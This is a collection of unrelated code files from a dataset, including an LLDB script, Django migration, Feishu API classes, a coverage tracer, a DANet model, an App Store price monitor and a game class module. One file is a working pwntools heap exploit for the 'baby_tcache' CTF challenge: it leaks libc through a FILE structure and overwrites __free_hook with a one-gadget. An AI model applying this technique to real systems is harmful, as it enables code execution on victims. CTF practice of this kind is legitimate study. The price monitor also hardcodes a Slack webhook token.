key = str(breakpoint.GetID())
GlobalOptions.symbols[key] = (symbols, options)
def __lldb_init_module(debugger, internal_dict):
debugger.HandleCommand(
'command script add -f breakifonfunc.breakifonfunc biof')
def breakifonfunc(debugger, command, exe_ctx, result, internal_dict):
'''
usage: biof [ModuleName] regex1 ||| [ModuleName2] regex2
Regex breakpoint that stops only if the second regex breakpoint is in the stack trace
For example, to only stop if code in the Test module resulted the setTintColor: being called
biof setTintColor: ||| . Test
'''
command_args = shlex.split(command, posix=False)
parser = generateOptionParser()
try:
(options, args) = parser.parse_args(command_args)
except e:
result.SetError(e)
return
# if len(args) >= 2:
# result.SetError(parser.usage)
# return
target = exe_ctx.target
# if len(command.split('|||')) != 2:
# result.SetError(parser.usage)
t = " ".join(args).split('|||')
clean_command = t[0].strip().split()
if len(clean_command) == 2:
breakpoint = target.BreakpointCreateByRegex(clean_command[0], clean_command[1])
else:
breakpoint = target.BreakpointCreateByRegex(clean_command[0], None)
moduleName = t[1].strip().split()[1]
module = target.module[moduleName]
if not module:
result.SetError('Invalid module {}'.format(moduleName))
return
searchQuery = t[1].strip().split()[0]
s = [i for i in module.symbols if re.search(searchQuery, i.name)]
GlobalOptions.addSymbols(s, options, breakpoint)
breakpoint.SetScriptCallbackFunction("breakifonfunc.breakpointHandler")
if not breakpoint.IsValid() or breakpoint.num_locations == 0:
result.AppendWarning("Breakpoint isn't valid or hasn't found any hits: " + clean_command[0])
else:
result.AppendMessage("\"{}\" produced {} hits\nOnly will stop if the following stack frame symbols contain:\n{}` \"{}\" produced {} hits".format(
clean_command[0], breakpoint.num_locations, module.file.basename, searchQuery, len(s)) )
def breakpointHandler(frame, bp_loc, dict):
if len(GlobalOptions.symbols) == 0:
print("womp something internal called reload LLDB init which removed the global symbols")
return True
key = str(bp_loc.GetBreakpoint().GetID())
searchSymbols = GlobalOptions.symbols[key][0]
options = GlobalOptions.symbols[key][1]
function_name = frame.GetFunctionName()
thread = frame.thread
if options.direct_call:
frame = thread.frame[1]
print frame
symbol = frame.symbol
return any([symbol in searchSymbols])
s = [i.symbol for i in thread.frames]
return any(x in s for x in searchSymbols)
def generateOptionParser():
usage = breakifonfunc.__doc__
parser = optparse.OptionParser(usage=usage, prog="biof")
parser.add_option("-d", "--direct",
action="store_true",
default=False,
dest="direct_call",
help="Only stop if the second regex directly calls the breakpoint")
return parser
| StarcoderdataPython |
1757354 | <reponame>ToniIvars/django-poll
# Generated by Django 3.2.3 on 2021-05-18 10:34
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Poll',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=100)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='author', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='PollAnswer',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('answer', models.CharField(max_length=50)),
('votes', models.IntegerField()),
],
),
migrations.CreateModel(
name='PollQuestion',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200)),
('answers', models.ManyToManyField(related_name='answers', to='my_polls.PollAnswer')),
('poll', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='poll', to='my_polls.poll')),
],
),
migrations.AddField(
model_name='pollanswer',
name='poll_question',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='poll_question', to='my_polls.pollquestion'),
),
migrations.AddField(
model_name='poll',
name='questions',
field=models.ManyToManyField(related_name='questions', to='my_polls.PollQuestion'),
),
]
| StarcoderdataPython |
3323690 | <filename>resource/convert.py
# coding=UTF-8
import time
def convert(path):
content = ""
with open(path, 'rb') as f:
content = f.read()
content = content.decode("gbk")
with open(path + "_" + str(time.time()), 'w') as f:
f.write(content)
if __name__ == "__main__":
convert("myself.html")
| StarcoderdataPython |
4804335 | # Code generated by lark_sdk_gen. DO NOT EDIT.
from pylark.lark_request import RawRequestReq, _new_method_option
from pylark import lark_type, lark_type_sheet, lark_type_approval
import attr
import typing
import io
@attr.s
class CreateCalendarEventAttendeeReqAttendee(object):
type: lark_type.CalendarEventAttendeeType = attr.ib(
default=None, metadata={"req_type": "json", "key": "type"}
) # 参与人类型;暂不支持创建邮箱参与人。, 示例值:"user", 可选值有: `user`:用户, `chat`:群组, `resource`:会议室, `third_party`:邮箱
is_optional: bool = attr.ib(
default=None, metadata={"req_type": "json", "key": "is_optional"}
) # 参与人是否为「可选参加」,无法编辑群参与人的此字段, 示例值:true, 默认值: `false`
user_id: str = attr.ib(
default="", metadata={"req_type": "json", "key": "user_id"}
) # 参与人的用户id,依赖于user_id_type返回对应的取值,当is_external为true时,此字段只会返回open_id或者union_id, 示例值:"ou_xxxxxxxx"
chat_id: str = attr.ib(
default="", metadata={"req_type": "json", "key": "chat_id"}
) # chat类型参与人的群组chat_id, 示例值:"oc_xxxxxxxxx"
room_id: str = attr.ib(
default="", metadata={"req_type": "json", "key": "room_id"}
) # resource类型参与人的会议室room_id, 示例值:"omm_xxxxxxxx"
third_party_email: str = attr.ib(
default="", metadata={"req_type": "json", "key": "third_party_email"}
) # third_party类型参与人的邮箱, 示例值:"<EMAIL>"
operate_id: str = attr.ib(
default="", metadata={"req_type": "json", "key": "operate_id"}
) # 如果日程是使用应用身份创建的,在添加会议室的时候,用来指定会议室的联系人,在会议室视图展示。, 示例值:"ou_xxxxxxxx"
@attr.s
class CreateCalendarEventAttendeeReq(object):
user_id_type: lark_type.IDType = attr.ib(
default=None, metadata={"req_type": "query", "key": "user_id_type"}
) # 用户 ID 类型, 示例值:"open_id", 可选值有: `open_id`:用户的 open id, `union_id`:用户的 union id, `user_id`:用户的 user id, 默认值: `open_id`, 当值为 `user_id`, 字段权限要求: 获取用户 user ID
calendar_id: str = attr.ib(
default="", metadata={"req_type": "path", "key": "calendar_id"}
) # 日历 ID, 示例值:"<EMAIL>u.cn"
event_id: str = attr.ib(
default="", metadata={"req_type": "path", "key": "event_id"}
) # 日程 ID, 示例值:"xxxxxxxxx_0"
attendees: typing.List[CreateCalendarEventAttendeeReqAttendee] = attr.ib(
factory=lambda: [], metadata={"req_type": "json", "key": "attendees"}
) # 新增参与人列表
need_notification: bool = attr.ib(
default=None, metadata={"req_type": "json", "key": "need_notification"}
) # 是否给参与人发送bot通知 默认为true, 示例值:false
@attr.s
class CreateCalendarEventAttendeeRespAttendeeChatMember(object):
rsvp_status: str = attr.ib(
default="", metadata={"req_type": "json", "key": "rsvp_status"}
) # 参与人RSVP状态, 可选值有: `needs_action`:参与人尚未回复状态,或表示会议室预约中, `accept`:参与人回复接受,或表示会议室预约成功, `tentative`:参与人回复待定, `decline`:参与人回复拒绝,或表示会议室预约失败, `removed`:参与人或会议室已经从日程中被移除
is_optional: bool = attr.ib(
factory=lambda: bool(), metadata={"req_type": "json", "key": "is_optional"}
) # 参与人是否为「可选参加」
display_name: str = attr.ib(
default="", metadata={"req_type": "json", "key": "display_name"}
) # 参与人名称
is_organizer: bool = attr.ib(
factory=lambda: bool(), metadata={"req_type": "json", "key": "is_organizer"}
) # 参与人是否为日程组织者
is_external: bool = attr.ib(
factory=lambda: bool(), metadata={"req_type": "json", "key": "is_external"}
) # 参与人是否为外部参与人
@attr.s
class CreateCalendarEventAttendeeRespAttendee(object):
type: lark_type.CalendarEventAttendeeType = attr.ib(
factory=lambda: lark_type.CalendarEventAttendeeType(),
metadata={"req_type": "json", "key": "type"},
) # 参与人类型;暂不支持创建邮箱参与人。, 可选值有: `user`:用户, `chat`:群组, `resource`:会议室, `third_party`:邮箱
attendee_id: str = attr.ib(
default="", metadata={"req_type": "json", "key": "attendee_id"}
) # 参与人ID
rsvp_status: str = attr.ib(
default="", metadata={"req_type": "json", "key": "rsvp_status"}
) # 参与人RSVP状态, 可选值有: `needs_action`:参与人尚未回复状态,或表示会议室预约中, `accept`:参与人回复接受,或表示会议室预约成功, `tentative`:参与人回复待定, `decline`:参与人回复拒绝,或表示会议室预约失败, `removed`:参与人或会议室已经从日程中被移除
is_optional: bool = attr.ib(
factory=lambda: bool(), metadata={"req_type": "json", "key": "is_optional"}
) # 参与人是否为「可选参加」,无法编辑群参与人的此字段
is_organizer: bool = attr.ib(
factory=lambda: bool(), metadata={"req_type": "json", "key": "is_organizer"}
) # 参与人是否为日程组织者
is_external: bool = attr.ib(
factory=lambda: bool(), metadata={"req_type": "json", "key": "is_external"}
) # 参与人是否为外部参与人;外部参与人不支持编辑
display_name: str = attr.ib(
default="", metadata={"req_type": "json", "key": "display_name"}
) # 参与人名称
chat_members: typing.List[
CreateCalendarEventAttendeeRespAttendeeChatMember
] = attr.ib(
factory=lambda: [], metadata={"req_type": "json", "key": "chat_members"}
) # 群中的群成员,当type为Chat时有效;群成员不支持编辑
user_id: str = attr.ib(
default="", metadata={"req_type": "json", "key": "user_id"}
) # 参与人的用户id,依赖于user_id_type返回对应的取值,当is_external为true时,此字段只会返回open_id或者union_id
chat_id: str = attr.ib(
default="", metadata={"req_type": "json", "key": "chat_id"}
) # chat类型参与人的群组chat_id
room_id: str = attr.ib(
default="", metadata={"req_type": "json", "key": "room_id"}
) # resource类型参与人的会议室room_id
third_party_email: str = attr.ib(
default="", metadata={"req_type": "json", "key": "third_party_email"}
) # third_party类型参与人的邮箱
operate_id: str = attr.ib(
default="", metadata={"req_type": "json", "key": "operate_id"}
) # 如果日程是使用应用身份创建的,在添加会议室的时候,用来指定会议室的联系人,在会议室视图展示。
@attr.s
class CreateCalendarEventAttendeeResp(object):
attendees: typing.List[CreateCalendarEventAttendeeRespAttendee] = attr.ib(
factory=lambda: [], metadata={"req_type": "json", "key": "attendees"}
) # 新增参与人后的日程所有参与人列表
def _gen_create_calendar_event_attendee_req(request, options) -> RawRequestReq:
return RawRequestReq(
dataclass=CreateCalendarEventAttendeeResp,
scope="Calendar",
api="CreateCalendarEventAttendee",
method="POST",
url="https://open.feishu.cn/open-apis/calendar/v4/calendars/:calendar_id/events/:event_id/attendees",
body=request,
method_option=_new_method_option(options),
need_tenant_access_token=True,
need_user_access_token=True,
)
| StarcoderdataPython |
137232 | <gh_stars>100-1000
"""
Coverage tracking internals.
"""
import sys
import threading
err = sys.stderr
import types, symbol
# use builtin sets if in >= 2.4, otherwise use 'sets' module.
try:
set()
except NameError:
from sets import Set as set
def get_interesting_lines(code):
"""
Count 'interesting' lines of Python in a code object, where
'interesting' is defined as 'lines that could possibly be
executed'.
This is done by dissassembling the code objecte and returning
line numbers.
"""
# clean up weird end-of-file issues
lines = set([ l for (o, l) in findlinestarts(code) ])
for const in code.co_consts:
if type(const) == types.CodeType:
lines.update(get_interesting_lines(const))
return lines
def findlinestarts(code):
"""Find the offsets in a byte code which are start of lines in the source.
Generate pairs (offset, lineno) as described in Python/compile.c.
CTB -- swiped from Python 2.5, module 'dis', so that earlier versions
of Python could use the function, too.
"""
byte_increments = [ord(c) for c in code.co_lnotab[0::2]]
line_increments = [ord(c) for c in code.co_lnotab[1::2]]
lastlineno = None
lineno = code.co_firstlineno
addr = 0
for byte_incr, line_incr in zip(byte_increments, line_increments):
if byte_incr:
if lineno != lastlineno:
yield (addr, lineno)
lastlineno = lineno
addr += byte_incr
lineno += line_incr
if lineno != lastlineno:
yield (addr, lineno)
class CodeTracer:
"""
Basic mechanisms for code coverage tracking, using sys.settrace.
"""
def __init__(self, exclude_prefix, include_only_prefix):
self.common = self.c = set()
self.section_name = None
self.sections = {}
self.started = False
assert not (exclude_prefix and include_only_prefix), \
"mutually exclusive"
self.excl = exclude_prefix
self.incl = include_only_prefix
def start(self):
"""
Start recording.
"""
if not self.started:
self.started = True
if self.excl and not self.incl:
global_trace_fn = self.g1
elif self.incl and not self.excl:
global_trace_fn = self.g2
else:
global_trace_fn = self.g0
sys.settrace(global_trace_fn)
if hasattr(threading, 'settrace'):
threading.settrace(global_trace_fn)
def stop(self):
if self.started:
sys.settrace(None)
if hasattr(threading, 'settrace'):
threading.settrace(None)
self.started = False
self.stop_section()
def g0(self, f, e, a):
"""
global trace function, no exclude/include info.
f == frame, e == event, a == arg .
"""
if e == 'call':
return self.t
def g1(self, f, e, a):
"""
global trace function like g0, but ignores files starting with
'self.excl'.
"""
if e == 'call':
excl = self.excl
path = f.f_globals.get('__file__')
if path is None:
path = f.f_code.co_filename
if excl and path.startswith(excl):
return
return self.t
def g2(self, f, e, a):
"""
global trace function like g0, but only records files starting with
'self.incl'.
"""
if e == 'call':
incl = self.incl
if incl and f.f_code.co_filename.startswith(incl):
return self.t
def t(self, f, e, a):
"""
local trace function.
"""
if e is 'line':
self.c.add((f.f_code.co_filename, f.f_lineno))
return self.t
def clear(self):
"""
wipe out coverage info
"""
self.c = {}
def start_section(self, name):
self.stop_section()
self.section_name = name
self.c = self.sections.get(name, set())
def stop_section(self):
if self.section_name:
self.sections[self.section_name] = self.c
self.section_name = None
self.c = self.common
class CoverageData:
"""
A class to manipulate and combine data from the CodeTracer object.
In general, do not pickle this object; it's simpler and more
straightforward to just pass the basic Python objects around
(e.g. CoverageData.common, a set, and CoverageData.sections, a
dictionary of sets).
"""
def __init__(self, trace_obj=None):
self.common = set()
self.sections = {}
if trace_obj:
self.update(trace_obj)
def update(self, trace_obj):
# transfer common-block code coverage -- if no sections are set,
# this will be all of the code coverage info.
self.common.update(trace_obj.common)
# update our internal section dictionary with the (filename, line_no)
# pairs from the section coverage as well.
for section_name, section_d in trace_obj.sections.items():
section_set = self.sections.get(section_name, set())
section_set.update(section_d)
self.sections[section_name] = section_set
def gather_files(self, name=None):
"""
Return the dictionary of lines of executed code; the dict
keys are filenames and values are sets containing individual
(integer) line numbers.
'name', if set, is the desired section name from which to gather
coverage info.
"""
cov = set()
cov.update(self.common)
if name is None:
for section_name, coverage_set in self.sections.items():
cov.update(coverage_set)
else:
coverage_set = self.sections.get(name, set())
cov.update(coverage_set)
# cov = list(cov)
# cov.sort()
files = {}
for (filename, line) in cov: # @CTB could optimize
d = files.get(filename, set())
d.add(line)
files[filename] = d
return files
def gather_sections(self, file):
"""
Return a dictionary of sets containing section coverage information for
a specific file. Dict keys are sections, and the dict values are
sets containing (integer) line numbers.
"""
sections = {}
for k, c in self.sections.items():
s = set()
for (filename, line) in c.keys():
if filename == file:
s.add(line)
sections[k] = s
return sections
| StarcoderdataPython |
164385 | """
DANet for image segmentation, implemented in Chainer.
Original paper: 'Dual Attention Network for Scene Segmentation,' https://arxiv.org/abs/1809.02983.
"""
__all__ = ['DANet', 'danet_resnetd50b_cityscapes', 'danet_resnetd101b_cityscapes']
import os
import chainer.functions as F
from chainer import link
from chainer import Chain
from functools import partial
from chainer.serializers import load_npz
from chainer.variable import Parameter
from chainer.initializers import _get_initializer
from .common import conv1x1, conv3x3_block
from .resnetd import resnetd50b, resnetd101b
class ScaleBlock(link.Link):
"""
Simple scale block.
Parameters:
----------
initial_alpha : obj, default 0
Initializer for the weights.
"""
def __init__(self,
initial_alpha=0):
super(ScaleBlock, self).__init__()
with self.init_scope():
alpha_initializer = _get_initializer(initial_alpha)
self.alpha = Parameter(
initializer=alpha_initializer,
shape=(1,),
name="alpha")
def __call__(self, x):
return self.alpha.data * x
class PosAttBlock(Chain):
"""
Position attention block from 'Dual Attention Network for Scene Segmentation,' https://arxiv.org/abs/1809.02983.
It captures long-range spatial contextual information.
Parameters:
----------
channels : int
Number of channels.
reduction : int, default 8
Squeeze reduction value.
"""
def __init__(self,
channels,
reduction=8):
super(PosAttBlock, self).__init__()
mid_channels = channels // reduction
with self.init_scope():
self.query_conv = conv1x1(
in_channels=channels,
out_channels=mid_channels,
use_bias=True)
self.key_conv = conv1x1(
in_channels=channels,
out_channels=mid_channels,
use_bias=True)
self.value_conv = conv1x1(
in_channels=channels,
out_channels=channels,
use_bias=True)
self.scale = ScaleBlock()
def __call__(self, x):
batch, channels, height, width = x.shape
proj_query = self.query_conv(x).reshape((batch, -1, height * width))
proj_key = self.key_conv(x).reshape((batch, -1, height * width))
proj_value = self.value_conv(x).reshape((batch, -1, height * width))
energy = F.batch_matmul(proj_query, proj_key, transa=True)
w = F.softmax(energy, axis=-1)
y = F.batch_matmul(proj_value, w, transb=True)
y = y.reshape((batch, -1, height, width))
y = self.scale(y) + x
return y
class ChaAttBlock(Chain):
"""
Channel attention block from 'Dual Attention Network for Scene Segmentation,' https://arxiv.org/abs/1809.02983.
It explicitly models interdependencies between channels.
"""
def __init__(self):
super(ChaAttBlock, self).__init__()
with self.init_scope():
self.scale = ScaleBlock()
def __call__(self, x):
batch, channels, height, width = x.shape
proj_query = x.reshape((batch, -1, height * width))
proj_key = x.reshape((batch, -1, height * width))
proj_value = x.reshape((batch, -1, height * width))
energy = F.batch_matmul(proj_query, proj_key, transb=True)
energy_new = F.broadcast_to(F.max(energy, axis=-1, keepdims=True), shape=energy.shape) - energy
w = F.softmax(energy_new, axis=-1)
y = F.batch_matmul(w, proj_value)
y = y.reshape((batch, -1, height, width))
y = self.scale(y) + x
return y
class DANetHeadBranch(Chain):
"""
DANet head branch.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
pose_att : bool, default True
Whether to use position attention instead of channel one.
"""
def __init__(self,
in_channels,
out_channels,
pose_att=True):
super(DANetHeadBranch, self).__init__()
mid_channels = in_channels // 4
dropout_rate = 0.1
with self.init_scope():
self.conv1 = conv3x3_block(
in_channels=in_channels,
out_channels=mid_channels)
if pose_att:
self.att = PosAttBlock(mid_channels)
else:
self.att = ChaAttBlock()
self.conv2 = conv3x3_block(
in_channels=mid_channels,
out_channels=mid_channels)
self.conv3 = conv1x1(
in_channels=mid_channels,
out_channels=out_channels,
use_bias=True)
self.dropout = partial(
F.dropout,
ratio=dropout_rate)
def __call__(self, x):
x = self.conv1(x)
x = self.att(x)
y = self.conv2(x)
x = self.conv3(y)
x = self.dropout(x)
return x, y
class DANetHead(Chain):
"""
DANet head block.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
"""
def __init__(self,
in_channels,
out_channels):
super(DANetHead, self).__init__()
mid_channels = in_channels // 4
dropout_rate = 0.1
with self.init_scope():
self.branch_pa = DANetHeadBranch(
in_channels=in_channels,
out_channels=out_channels,
pose_att=True)
self.branch_ca = DANetHeadBranch(
in_channels=in_channels,
out_channels=out_channels,
pose_att=False)
self.conv = conv1x1(
in_channels=mid_channels,
out_channels=out_channels,
use_bias=True)
self.dropout = partial(
F.dropout,
ratio=dropout_rate)
def __call__(self, x):
pa_x, pa_y = self.branch_pa(x)
ca_x, ca_y = self.branch_ca(x)
y = pa_y + ca_y
x = self.conv(y)
x = self.dropout(x)
return x, pa_x, ca_x
class DANet(Chain):
"""
DANet model from 'Dual Attention Network for Scene Segmentation,' https://arxiv.org/abs/1809.02983.
Parameters:
----------
backbone : nn.Sequential
Feature extractor.
backbone_out_channels : int, default 2048
Number of output channels form feature extractor.
aux : bool, default False
Whether to output an auxiliary result.
fixed_size : bool, default True
Whether to expect fixed spatial size of input image.
in_channels : int, default 3
Number of input channels.
in_size : tuple of two ints, default (480, 480)
Spatial size of the expected input image.
classes : int, default 19
Number of segmentation classes.
"""
def __init__(self,
backbone,
backbone_out_channels=2048,
aux=False,
fixed_size=True,
in_channels=3,
in_size=(480, 480),
classes=19):
super(DANet, self).__init__()
assert (in_channels > 0)
assert ((in_size[0] % 8 == 0) and (in_size[1] % 8 == 0))
self.in_size = in_size
self.classes = classes
self.aux = aux
self.fixed_size = fixed_size
with self.init_scope():
self.backbone = backbone
self.head = DANetHead(
in_channels=backbone_out_channels,
out_channels=classes)
def __call__(self, x):
in_size = self.in_size if self.fixed_size else x.shape[2:]
x, _ = self.backbone(x)
x, y, z = self.head(x)
x = F.resize_images(x, output_shape=in_size)
if self.aux:
y = F.resize_images(y, output_shape=in_size)
z = F.resize_images(z, output_shape=in_size)
return x, y, z
else:
return x
def get_danet(backbone,
classes,
aux=False,
model_name=None,
pretrained=False,
root=os.path.join("~", ".chainer", "models"),
**kwargs):
"""
Create DANet model with specific parameters.
Parameters:
----------
backbone : nn.Sequential
Feature extractor.
classes : int
Number of segmentation classes.
aux : bool, default False
Whether to output an auxiliary result.
model_name : str or None, default None
Model name for loading pretrained model.
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.chainer/models'
Location for keeping the model parameters.
"""
net = DANet(
backbone=backbone,
classes=classes,
aux=aux,
**kwargs)
if pretrained:
if (model_name is None) or (not model_name):
raise ValueError("Parameter `model_name` should be properly initialized for loading pretrained model.")
from .model_store import get_model_file
load_npz(
file=get_model_file(
model_name=model_name,
local_model_store_dir_path=root),
obj=net)
return net
def danet_resnetd50b_cityscapes(pretrained_backbone=False, classes=19, aux=True, **kwargs):
"""
DANet model on the base of ResNet(D)-50b for Cityscapes from 'Dual Attention Network for Scene Segmentation,'
https://arxiv.org/abs/1809.02983.
Parameters:
----------
pretrained_backbone : bool, default False
Whether to load the pretrained weights for feature extractor.
classes : int, default 19
Number of segmentation classes.
aux : bool, default True
Whether to output an auxiliary result.
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.chainer/models'
Location for keeping the model parameters.
"""
backbone = resnetd50b(pretrained=pretrained_backbone, ordinary_init=False, bends=(3,)).features
del backbone.final_pool
return get_danet(backbone=backbone, classes=classes, aux=aux, model_name="danet_resnetd50b_cityscapes",
**kwargs)
def danet_resnetd101b_cityscapes(pretrained_backbone=False, classes=19, aux=True, **kwargs):
"""
DANet model on the base of ResNet(D)-101b for Cityscapes from 'Dual Attention Network for Scene Segmentation,'
https://arxiv.org/abs/1809.02983.
Parameters:
----------
pretrained_backbone : bool, default False
Whether to load the pretrained weights for feature extractor.
classes : int, default 19
Number of segmentation classes.
aux : bool, default True
Whether to output an auxiliary result.
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.chainer/models'
Location for keeping the model parameters.
"""
backbone = resnetd101b(pretrained=pretrained_backbone, ordinary_init=False, bends=(3,)).features
del backbone.final_pool
return get_danet(backbone=backbone, classes=classes, aux=aux, model_name="danet_resnetd101b_cityscapes",
**kwargs)
def _test():
import numpy as np
import chainer
chainer.global_config.train = False
in_size = (480, 480)
aux = False
pretrained = False
models = [
danet_resnetd50b_cityscapes,
danet_resnetd101b_cityscapes,
]
for model in models:
net = model(pretrained=pretrained, in_size=in_size, aux=aux)
weight_count = net.count_params()
print("m={}, {}".format(model.__name__, weight_count))
assert (model != danet_resnetd50b_cityscapes or weight_count == 47586427)
assert (model != danet_resnetd101b_cityscapes or weight_count == 66578555)
batch = 2
classes = 19
x = np.zeros((batch, 3, in_size[0], in_size[1]), np.float32)
ys = net(x)
y = ys[0] if aux else ys
assert ((y.shape[0] == x.shape[0]) and (y.shape[1] == classes) and (y.shape[2] == x.shape[2]) and
(y.shape[3] == x.shape[3]))
if __name__ == "__main__":
_test()
| StarcoderdataPython |
3384583 | <filename>assets/img/baby_tcache/exploit.py
from pwn import *
import sys
HOST='192.168.127.12'
PORT=56746
context.terminal=['tmux', 'splitw', '-h']
if len(sys.argv)>1:
r=remote(HOST,PORT)
else:
r=process('./baby_tcache',env={"LD_PRELOAD":"./libc.so.6"})
libc=ELF("./libc.so.6")
def menu(opt):
r.sendlineafter("Your choice: ",str(opt))
def alloc(size,data='a'):
menu(1)
r.sendlineafter("Size:",str(size))
r.sendafter("Data:",data)
def delete(idx):
menu(2)
r.sendlineafter("Index:",str(idx))
def getleak():
alloc(0x500-0x8) # 0
alloc(0x30) # 1
alloc(0x40) # 2
alloc(0x50) # 3
alloc(0x60) # 4
alloc(0x500-0x8) # 5
alloc(0x70) # 6
delete(4)
alloc(0x68,'A'*0x60+'\x60\x06') # set the prev size
delete(2)
delete(0)
delete(5) # backward coeleacsing
alloc(0x500-0x9+0x34)
delete(4)
alloc(0xa8,'\x60\x07') # corrupt the fd
alloc(0x40,'a')
gdb.attach(r,'''b*0x0000555555554D21\nb*_IO_file_seek''')
alloc(0x3e,p64(0xfbad1800)+p64(0)*3+'\x00') # overwrite the file-structure
r.recv(8)
libc.address=u64(r.recv(8))-0x3ed8b0
log.info("libc @ "+hex(libc.address))
alloc(0xa8,p64(libc.symbols['__free_hook']))
alloc(0x60,"A")
alloc(0x60,p64(libc.address+0x4f322)) # one gadget with $rsp+0x40 = NULL
delete(0)
r.interactive()
if __name__=='__main__':
getleak()
| StarcoderdataPython |
61449 | #!/usr/bin/env python3
VERSION = "0.0.1-sig"
import requests, json, time, traceback
from random import random
from bs4 import BeautifulSoup
WEBHOOK_URL = "https://hooks.slack.com/services/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"
TEST_URL = "https://apps.apple.com/cn/app/goodnotes-4/id778658393"
SLEEP_IN = 3
URL_LIST = [
"https://apps.apple.com/cn/app/goodnotes-5/id1444383602",
]
def get_price(url:str):
headers = {
"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3",
"Accept-Encoding": "gzip, deflate, br",
"Accept-Language":"zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7",
"Cache-Control": "max-age=0",
"Connection": "keep-alive",
"DNT": "1",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36"
}
r = requests.get(url, headers = headers)
soup = BeautifulSoup(r.text,'lxml')
info = soup.find("header", class_="product-header")
title = info.find("h1", class_="product-header__title").text.strip().split("\n")[0]
price = info.find("li",class_="app-header__list__item--price").text
return title, price, url
def post_message(text) -> None:
payload = {
"text": text
}
r = requests.post(WEBHOOK_URL, data = json.dumps(payload))
if r.text != 'ok': raise RuntimeError("信息发送失败")
def get_prices(urls:list, sleep_func) -> list:
result = []
for url in urls:
data = get_price(url)
result.append(data)
sleep = sleep_func()
time.sleep(sleep)
return result
def handle_check(urls:list, check_sleep:int, item_sleep):
print("启动价格查询序列...")
mem_list = []
while True:
try:
new_prices = []
new_datas = get_prices(urls, item_sleep)
## 对于每条新数据,遍历
for new_data in new_datas:
## 如果存在变化或者不存在
if not new_data in mem_list:
title = new_data[0]
old_item = None
# 找到旧项目
for mem_item in mem_list:
if title == mem_item[0]:
old_item = mem_item
break
## 删除旧项目
if old_item != None:
mem_list.remove(old_item)
## 更新内存和消息
mem_list.append(new_data)
new_prices.append(new_data)
if len(new_prices) != 0:
print("发现存在数据更新,启动消息发送序列...")
for item in new_prices:
message = "[APP] %s 价格发生变动,当前价格: %s <%s|查看>"%item
print("发现更新:%s"%message)
post_message(message)
except Exception as e:
print("发生错误:")
print(traceback.format_exc())
finally:
time.sleep(check_sleep)
print("价格查询序列结束...")
def simple_time():
return int(random() * SLEEP_IN)
if __name__ == "__main__":
import argparse
p = argparse.ArgumentParser(prog='AppStore 价格监测程序',
description="监测 App Store 价格变化,当其发生改变,则推送通知到 Slack")
p.add_argument("-s","--slack", dest="slack", help="Slack WebHook URL", type=str)
p.add_argument("-t1","--time1", dest="time1", help="轮询时长,单位为 s", default=1000, type=int)
p.add_argument("-t2","--time2", dest="time2", help="单个查询间隔时长,单位为 s", type=int)
args = p.parse_args()
if args.slack != None:
WEBHOOK_URL = args.slack
if args.time2 != None:
SLEEP_IN = args.time2
print("Checking with args", args)
handle_check(URL_LIST, args.time1, simple_time) | StarcoderdataPython |
106591 | from templeplus.pymod import PythonModifier
from toee import *
import tpdp
import char_class_utils
import tpactions
###################################################
def GetConditionName():
return "Swashbuckler"
print "Registering " + GetConditionName()
classEnum = stat_level_swashbuckler
classSpecModule = __import__('class049_swashbuckler')
###################################################
#### standard callbacks - BAB and Save values
def OnGetToHitBonusBase(attachee, args, evt_obj):
classLvl = attachee.stat_level_get(classEnum)
babvalue = game.get_bab_for_class(classEnum, classLvl)
evt_obj.bonus_list.add(babvalue, 0, 137) # untyped, description: "Class"
return 0
def OnGetSaveThrowFort(attachee, args, evt_obj):
value = char_class_utils.SavingThrowLevel(classEnum, attachee, D20_Save_Fortitude)
evt_obj.bonus_list.add(value, 0, 137)
return 0
def OnGetSaveThrowReflex(attachee, args, evt_obj):
value = char_class_utils.SavingThrowLevel(classEnum, attachee, D20_Save_Reflex)
evt_obj.bonus_list.add(value, 0, 137)
return 0
def OnGetSaveThrowWill(attachee, args, evt_obj):
value = char_class_utils.SavingThrowLevel(classEnum, attachee, D20_Save_Will)
evt_obj.bonus_list.add(value, 0, 137)
return 0
classSpecObj = PythonModifier(GetConditionName(), 0)
classSpecObj.AddHook(ET_OnToHitBonusBase, EK_NONE, OnGetToHitBonusBase, ())
classSpecObj.AddHook(ET_OnSaveThrowLevel, EK_SAVE_FORTITUDE, OnGetSaveThrowFort, ())
classSpecObj.AddHook(ET_OnSaveThrowLevel, EK_SAVE_REFLEX, OnGetSaveThrowReflex, ())
classSpecObj.AddHook(ET_OnSaveThrowLevel, EK_SAVE_WILL, OnGetSaveThrowWill, ())
#Checks for a load greater than light or armor greater than light (to enable various abilities)
def SwashbucklerEncumberedCheck(obj):
#Light armor or no armor
armor = obj.item_worn_at(5)
if armor != OBJ_HANDLE_NULL:
armorFlags = armor.obj_get_int(obj_f_armor_flags)
if (armorFlags != ARMOR_TYPE_LIGHT) and (armorFlags != ARMOR_TYPE_NONE):
return 1
#No heavy or medium load
HeavyLoad = obj.d20_query(Q_Critter_Is_Encumbered_Heavy)
if HeavyLoad:
return 1
MediumLoad = obj.d20_query(Q_Critter_Is_Encumbered_Medium)
if MediumLoad:
return 1
return 0
#Check if the weapons is usable with finesse
